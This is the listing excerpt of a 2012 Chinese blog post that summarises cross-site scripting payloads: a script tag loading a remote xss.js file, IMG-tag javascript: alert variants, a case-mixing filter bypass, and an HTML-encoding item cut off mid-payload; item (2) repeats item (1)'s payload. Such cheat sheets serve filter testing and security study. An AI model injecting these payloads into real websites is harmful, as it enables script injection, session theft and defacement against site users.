摘要: (1)普通的XSS JavaScript注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(3)IMG标签无分号无引号<IMG SRC=javascript:alert(‘XSS’)>(4)IMG标签大小写不敏感<IMG SRC=JaVaScRiPt:alert(‘XSS’)>(5)HTML编码(必须有分号)<IMG SRC=jav 阅读全文
posted @ 2012-10-20 09:02 Nicholas_F 阅读(7921) 评论(0) 推荐(0) 编辑